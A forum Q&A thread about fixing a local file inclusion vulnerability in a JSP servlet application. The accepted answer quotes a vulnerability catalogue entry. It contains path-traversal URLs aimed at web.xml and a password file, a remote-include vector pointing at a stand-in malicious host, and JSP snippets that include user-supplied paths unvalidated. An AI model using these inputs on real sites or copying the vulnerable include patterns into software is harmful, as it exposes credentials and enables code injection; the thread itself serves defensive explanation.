# Dangerous File Inclusion: Local vulnerability

Tags: java, jsp, security, servlets

Please help me how can i resolve Dangerous File Inclusion: Local vulnerability  from the
website i am working on.

eg

http://test.abc.com:80/abc.jsp?AccessKey=/..//WEB-INF/web.xml

It jsp servlets application.

Thanks

Answer (score 0, accepted):

I cannot access that page, but there's information of how to avoid that error here:

http://www.hpenterprisesecurity.com/vulncat/en/vulncat/java/dangerous_file_inclusion.html

> Dangerous File Inclusion
>
> Allowing unvalidated user input to control files that are included
>   dynamically in a JSP can lead to malicious code execution. EXPLANATION
>
> Many modern web scripting languages enable code re-use and
>   modularization through the ability to include additional source files
>   within one encapsulating file. This ability is often used to apply a
>   standard look and feel to an application (templating), share functions
>   without the need for compiled code, or break the code into smaller
>   more manageable files. Included files are interpreted as part of the
>   parent file and executed in the same manner. File inclusion
>   vulnerabilities occur when the path of the included file is controlled
>   by unvalidated user input.
>
> Example 1: The following is an example of Local File Inclusion
>   vulnerability. The sample code takes a user specified template name
>   and includes it in the JSP page to be rendered.

```
<jsp:include page="<%=(String)request.getParameter(\"template\")%>">
```

> If the attacker specifies a valid file to the dynamic include
>   statement, the contents of that file will be passed to the JSP
>   interpreter to be rendered on the page.
>
> In the case of an attack vector of the form
>
> specialpage.jsp?template=/WEB-INF/database/passwordDB
>
> the JSP interpreter will render the contents of the
>   /WEB-INF/database/passwordDB file to the JSP page thus compromising
>   the security of the system.
>
> Worse, if the attacker can specify a path to a remote site controlled
>   by the attacker, then the dynamic include statement will execute
>   arbitrary malicious code supplied by the attacker.
>
> Example 2: An example of Remote File Inclusion vulnerability is shown
>   below. The sample code uses the c:import tag to import a user
>   specified remote file into the current JSP page.

```
<c:import url="<%= request.getParameter("privacy")%>">
```

> An attack vector of the form
>
> policy.jsp?privacy=http://www.malicioushost.com/attackdata.js
>
> can inject malicious code into the current JSP page from a remote site
>   controlled by the attacker.

So you should check the includes of your jsp